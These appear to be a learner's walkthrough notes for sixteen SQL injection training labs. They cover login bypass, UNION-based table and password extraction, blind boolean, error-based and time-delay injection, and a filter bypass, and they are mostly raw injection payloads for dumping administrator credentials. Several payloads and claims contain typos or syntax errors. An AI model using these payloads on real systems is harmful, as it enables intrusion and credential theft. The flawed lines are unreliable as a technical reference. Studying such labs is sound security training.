# Some cases of SQL injection

## 1. SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

When the user selects the Gifts section, the query will be:

`SELECT* FROM products WHERE category='Gifts' AND released=1`

Implement insert `'or 1=1 --` then the question will be

`SELECT* FROM products WHERE category='Gifts' or 1=1 -- AND released =`

Then, `SELECT` will select all the information from products table.

## 2. SQL injection vulnerability allowing login bypass

When inserted into `administrator' or 1=1--` then when querying
`WHERE username = administrator' or 1=1-- 
will return a result of `TRUE`, so you can log in with a username of administrator.

## 3. SQL injection attack, querying the database type and version on Oracle

Use the query `'UNION SELECT 'abc' FROM DUAL`, which in turn increments the columns `SELECT` is needed to determine the number of columns that return the data of the preceding query. Because 
`UNION` only returns when both queries have the same number of columns and the dual table is an existing table 
in Oracle.

Continue querying the version by inserting `'UNION SELECT BANNER,' 'xyz' 
FROM V$VERSION.`

Since `UNION` is a combination, the data of both `SELECT` sentences will be displayed.

## 4. SQL injection attack, querying the database type and version on MySQL and Microsoft.

Edit the filter category one by one, increasing the number of columns returned. 

For example, you can insert `'UNION SELECT 'a'#`. 

The `#` sign at the end functions as a comment, similar to `--comment.`

Once you determine the number of data columns returned, modify the filter category to query the version by inserting `'UNION SELECT @@VERSION, NULL#.`

## 5. SQL injection attack, listing the database contents on non-Oracle databases.

Insert `'ORDER BY 2--` to check the number of data columns returned, when `'ORDER BY 3--` will return an Internal Server Error. Deduce the number of returned data columns is 2.

Insert `'UNION SELECT TABLE_NAME, NULL FROM INFROMATION_SCHEMA.TABLES--` to find tables that could contain user information. 

Continue inserting `'UNION SELECT COLUMN_NAME, NULL FROM INFROMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users_qoecyz'--` to find names of data columns.

After querying, we found that the names of the two columns are `username_X` and `password_Y`.

Next, insert `'UNION SELECT password_Y, NULL FROM users_qoecyz 
WHERE username_X = 'administrator'--` to retrieve the password of the administrator.

## 6. SQL injection attack, listing the database contents on Oracle

Insert `'UNION SELECT 'a', 'b' FROM DUAL--` to determine the number of columns returned.

Insert `'UNION SELECT TABLE_NAME, NULL FROM ALL_TABLES--` to find table names that contain user information.

Insert `'UNION SELECT COLUMN_NAME, NULL FROM 
ALL_TAB_COLUMNS WHERE TABLE_NAME = 'USERS_ELCPUF'--` to determine the column that contains usernames and user passwords. We can see that the two columns are `USERNAME_OTLSQB` and `PASSWORD_ALNMIB.`

Finally, after inserting `'UNION SELECT PASSWORD_ALNMIB, NULL FROM USERS_ELCPUF 
WHERE USERNAME_OTLSQB ='administrator'--` we can retrieve the administrator' password.

## 7. SQL injection UNION attack determining the number of columns returned by the query

We can insert `'UNION SELECT NULL, NULL, NULL--` or `'ORDER BY 3--` to find the columns returned. Increase the number of `NULL` select columns or the number of columns, respectively in the ordering. 

With `'UNION SELECT NULL, NULL, NULL--` returns an error if the number of select columns is not correct.

Using `'ORDER BY 3'` returns an error if the number of columns in the previous query is exceeded.

## 8. SQL injection UNION attack, finding a column containing text

Insert `'ORDER BY 3--` to determine the columns returned.

Try inserting one by one to identify the text return column:

`'UNION SELECT 'a', NULL, NULL--`

`'UNION SELECT NULL, 'a', NULL--`

`'UNION SELECT NULL, NULL, 'a'--`

`...`

## 9. SQL injection UNION attack, retrieving data from other tables

Insert `'ORDER BY 2--` to determine the comlumns returned.

Insert `'UNION SELECT TABLE_NAME, NULL FROM 
INFORMATION_SCHEMA.TABLES--` to determine table names that contain users' information.

Insert `'UNION SELECT COLUMN_NAME, NULL FROM 
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'--` to determine the columns that contain username and user password.

Last, insert `'UNION SELECT password FROM users WHERE username = 
'administrator'--` to retrieve the administrator's information.

## 10. SQL injection UNION attack, retrieving multiple values in a single column

Use Burp Suite to intercept and modify the request that sets the product category filter.

Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, only one of which contain text, using a payload like the following in the category parameter: `'+UNION+SELECT+NULL,'abc'--`

Use the following payload to retrieve the contents of the users table: `'+UNION+SELECT+NULL,username||'~'||password+FROM+users--`

Verify that the application's response contains usernames and passwords.

And the returned answer is `administrator~lzycs1llv2jnhf80dwh1`

## 11. Blind SQL injection with conditional responses

Validate if the "users" table exists by inserting:

`and (SELECT 'x' FROM users LIMIT1)='x'--`

The result will return that users table doesn't exist.

Authenticating the administrator username does not exist in the users table by inserting:

`and (SELECT username FROM users WHERE username='administrator')='administrator'--`

And this will return that the administrator user exist.

Next, we will redict the password length of the administrator user by adding `length(password) > 1` and `length(password) > 50`. 

`and (SELECT username FROM users WHERE username='administrator' and length(password) > 1)='administrator'--`

`and (SELECT username FROM users WHERE username='administrator' and length(password) > 50)='administrator'--`

The length of the password is between [1;50] characters. To find more quickly, we use sniper. Wait a minute and we can find the right length.

After have the true length, we will predict the first character of the password by inserting:

`and (SELECT substring(password, 1, 1) from users WHERE username='adminitrator')='a'--`

If it is not the right, we use Brute Force method and can find the result.

To find other characters of the password, we switch to cluster bomb mode and set up two payloads, with payload 1 indicating the location of the password and payload 2 representing the character that is held at that position. Then proceed to launch the attack. 

## 12. Blind SQL injection with conditional errors

Confirm that the parameter is vulnerable by inserting `'|| (SELECT '' FROM DUAL) ||'`

After finding that right, we determine that the users table exists in the database by inserting `'|| (SELECT '' FROM users WHERE rownum=1) ||'`

It will be returned as true.

Next, confirm whether the administrator user exists in the users database or not by inserting:

`'|| (SELECT '' FROM users WHERE username='administrator') ||'` => return 200 OK

`'|| (SELECT CASE WHEN (1=0) THEN TO_CHAR(1/0) ELSE '' END FROM DUAL) ||'` => return 200 OK

`'|| (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator') ||'` => return 500 Internal Server Error, it also means the administrator user exists.

For right now, we can attack this lab. First, determine the password's length by adding the query `length(password) > 1` and `length(password) > 50`. This means the password's length is between [1;50] characters.

`'|| (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator' and length(password) > 1) ||'`

`'|| (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator' and length(password) > 50) ||'`

To find the length of the password exactly, we proceed to use the sniper method:

- Find the first character:
`'|| (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator' and substr(password, 1, 1) = 'a') ||'` => find the request has a status code response of 500

- Find other characters: we switch to cluster bomb mode and set up two payloads, with payload 1 indicating the location of the password and payload 2 representing the character that is held at that position. Then proceed to launch the attack. Obtained characters will have a status of 500.

## 13. Visible error-based SQL injection

Adding the `'` sign to the back of the `TrackingId`. In the response section, note the lengthy error message. This reveals the full SQL query, including the cookie value.

Next, in the request, adding `'--` to the query. Then use up to CAST statement by inserting `' AND CAST(SELECT 1) as int)--`. We will receive an error.

Switch to boolean type: `' AND 1=CAST(SELECT 1) as int)--` => Do not receive error message, so we can follow this attack.

Change a little bit of adding query `' AND 1=CAST(SELECT username FROM users) as int)--`. The returned result shows that it's right cause we do not receireceive error message.

Delete the TrackingId and only retain ` AND 1=CAST(SELECT username FROM users) as int)--`. 

This will return more than 1 line, so we add LIMIT 1 `' AND 1=CAST(SELECT username FROM users LIMIT 1) as int)--`

Returned result is not have administrator. Therefore, we change to select password:

`AND 1=CAST(SELECT password FROM users) as int)--`. 

And now, we receive the password of administrator.

## 14. Blind SQL injection with time delays

You can cause a time delay in the database when the query is processed. The following will cause an unconditional time delay of 10 seconds:

- Oracle: `dbms_pipe.recieve_message(('a'),10)`
  
- Microsoft: `WAITFOR DELAY '0:0:10'`

- PostgreSQL: `SELECT pg_sleep(10)`

- MySQL: `SELECT SLEEP(10)`

Suppose that it is MySQL, we insert for the following structure to the query: `' || (SELECT SLEEP(10))--` => Lab will be completed.

## 15. Blind SQL injection with time delays and information retrieval

Confirm that web is vulnerable: `' || pg_sleep(10)--`

Determine whether users table exists by adding:

`' || (SELECT CASE WHEN (1=1) THEN pg_sleep(10) else pg_sleep(-1) end)--`

`' || (SELECT CASE WHEN (usename='administrator') THEN pg_sleep(10) else pg_sleep(-1) end from users)--` => Return that users table exists.

Next, we predict the password's length by adding `length(password)>1` and `length(password)>25`. It also means the length is between [1;25] characters.

`' || (SELECT CASE WHEN (usename='administrator' and length(password)>1) THEN pg_sleep(10) else pg_sleep(-1) end from users)--`

`' || (SELECT CASE WHEN (usename='administrator' and length(password)>25) THEN pg_sleep(10) else pg_sleep(-1) end from users)--`

Sniper the length and receive the first response least received => Have the right length of password.

Last, to predict password by using sniper method:

- Find the first character:
`' || (SELECT CASE WHEN (usename='administrator' and substr(password, 1, 1)='a') THEN pg_sleep(10) else pg_sleep(-1) end from users)--`` => find the request has time delays more than 10 seconds.

- Find other characters: we switch to cluster bomb mode and set up two payloads, with payload 1 indicating the location of the password and payload 2 representing the character that is held at that position. Then proceed to launch the attack.

## 16. SQL injection with filter bypass via XML encoding

Adding into `storeId` in the request: `UNION SELECT NULL`

Although attacking, we are unsuccessful. The response section has the answer 'Attack 
detected'.

Using hackvertor to attack. This will return 1 column, so we can merge username and password by inserting into `storeId` with: `UNION SELECT username || '-' || password FROM users`
